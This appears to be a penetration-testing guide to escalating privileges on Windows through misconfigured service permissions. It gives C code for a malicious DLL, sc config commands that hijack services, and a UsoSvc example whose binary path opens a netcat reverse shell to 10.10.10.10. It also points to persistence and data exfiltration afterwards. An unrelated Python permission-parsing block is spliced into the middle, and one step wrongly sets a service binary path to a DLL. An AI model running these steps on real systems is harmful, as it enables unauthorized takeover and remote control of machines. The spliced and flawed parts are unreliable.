EoP - Incorrect permissions in services

Key Concepts

1. Service Permissions

  • Writable services: Only trusted users should have write permissions.

  • Service path vulnerabilities: Writable paths may allow DLL hijacking or binary replacement.

2. Common Vulnerabilities

  • Orphaned installs: Services with missing or unmaintained binaries.

  • DLL hijacking: Services load malicious DLLs from writable locations.

  • Weak PATH permissions: Writable PATH directories allow privilege escalation.


Step-by-Step Guide to Identifying and Exploiting Vulnerable Services

1. Checking File Permissions

Use the icacls command to inspect service binary permissions:

icacls "C:\path\to\service\binary.exe"

Look for vulnerable permissions like:

  • BUILTIN\Users:(F) - Full access

  • BUILTIN\Users:(M) - Modify access

  • BUILTIN\Users:(W) - Write access

Example:

icacls "C:\Windows\System32\example_service.exe"

Output:

example_service.exe BUILTIN\Administrators:(I)(F)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(M)
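To make the check above repeatable across many binaries, the following parser (an added example, not part of the original page) reads icacls output and reports every ACE that grants a low-privilege group a write-equivalent right. It handles the icacls layout shown above (file name on the first line, indented ACEs, trailing summary line), ignores inheritance flags, and skips deny ACEs. The set of low-privilege principals and the sample output are constructed for this example; it assumes icacls echoes the path exactly as it was passed on the command line.

```python
import re

# Groups every local or interactive user belongs to (constructed set for this example).
LOW_PRIV_PRINCIPALS = {"builtin\\users", "everyone",
                       "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that let the holder replace the binary or rewrite its ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<groups>(?:\([^)]*\))+)$")


def parse_ace(line):
    """Return (principal, rights) for one icacls ACE line, or None for deny/non-ACE lines."""
    m = ACE_RE.match(line.strip())
    if not m:
        return None
    groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
    if "DENY" in groups:
        return None  # a deny ACE removes rights; it never grants write access
    rights = set()
    for group in groups:
        if group not in INHERIT_FLAGS:  # (I)(OI)(CI)... only describe inheritance
            rights.update(token.strip() for token in group.split(","))
    return m.group("principal").strip(), rights


def writable_by_low_priv(path, icacls_output):
    """List (principal, write rights) for ACEs that let low-privilege groups modify `path`."""
    findings = []
    for raw in icacls_output.splitlines():
        line = raw.strip()
        if line.startswith(path):  # icacls prints the path as given before the first ACE
            line = line[len(path):].strip()
        parsed = parse_ace(line)  # blank lines and the summary line parse to None
        if parsed is None:
            continue
        principal, rights = parsed
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((principal, sorted(rights & WRITE_RIGHTS)))
    return findings


# Constructed icacls output: the page's example plus a deny ACE and a read-only ACE.
SAMPLE_OUTPUT = """\
example_service.exe BUILTIN\\Administrators:(I)(F)
                    NT AUTHORITY\\SYSTEM:(I)(F)
                    BUILTIN\\Users:(I)(M)
                    Everyone:(DENY)(W)
                    NT AUTHORITY\\Authenticated Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
"""
```

Calling writable_by_low_priv("example_service.exe", SAMPLE_OUTPUT) returns [("BUILTIN\\Users", ["M"])], the same ACE the listing above exposes, while the deny and read-only entries produce no finding.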

2. Finding Vulnerable Services

List services with their executable paths:

wmic service list full | findstr /i "path"

Inspect individual service configurations:

for /f "tokens=2" %a in ('wmic service get name^, displayname^, pathname') do @sc qc %a | findstr "BINARY_PATH_NAME"

3. Identifying Potential DLL Hijacking

Using PowerUp to find DLL hijacking paths:

Import-Module PowerUp.ps1
Find-PathDLLHijack

Using Process Monitor (ProcMon):

  • Filter for NAME NOT FOUND entries during service startup to identify missing DLLs.


4. Compiling a Malicious DLL

Create a DLL that executes commands when it is loaded into the service process. Use the following sample code:

C Code for Malicious DLL:

#include <windows.h>
#include <stdlib.h>   /* system() */

/* DllMain is called by the loader; the payload runs when a process loads the DLL. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        /* Record which account the host process runs as, then terminate the host. */
        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Compile the DLL:

  • For x64:

    x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

  • For x86:

    i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

5. Exploiting the Vulnerability

  1. Stop the Service:

    sc stop <ServiceName>

  2. Modify the Service Binary Path:

    sc config <ServiceName> binPath= "C:\path\to\your\malicious.dll"

  3. Start the Service:

    sc start <ServiceName>

Example: Exploiting UsoSvc (CVE-2019-1322)

  1. Stop the Service:

    sc stop UsoSvc

  2. Modify Binary Path to Execute Payload:

    sc config UsoSvc binPath= "C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"

  3. Start the Service:

    sc start UsoSvc

6. Post-Exploitation

After gaining elevated privileges:

  • Maintain access: Establish persistence (e.g., backdoor or scheduled tasks).

  • Further exploitation: Explore lateral movement or sensitive data exfiltration.


Tools for Service Permission Analysis

Accesschk (Sysinternals)

Analyze permissions on a specific service:

accesschk.exe -uwcqv <ServiceName>

Metasploit Module

Automate the process using Metasploit:

exploit/windows/local/service_permissions

Security Considerations

  • Monitor permissions on critical services and binaries.

  • Restrict write access to trusted users.

  • Regularly audit PATH directories for inappropriate permissions.
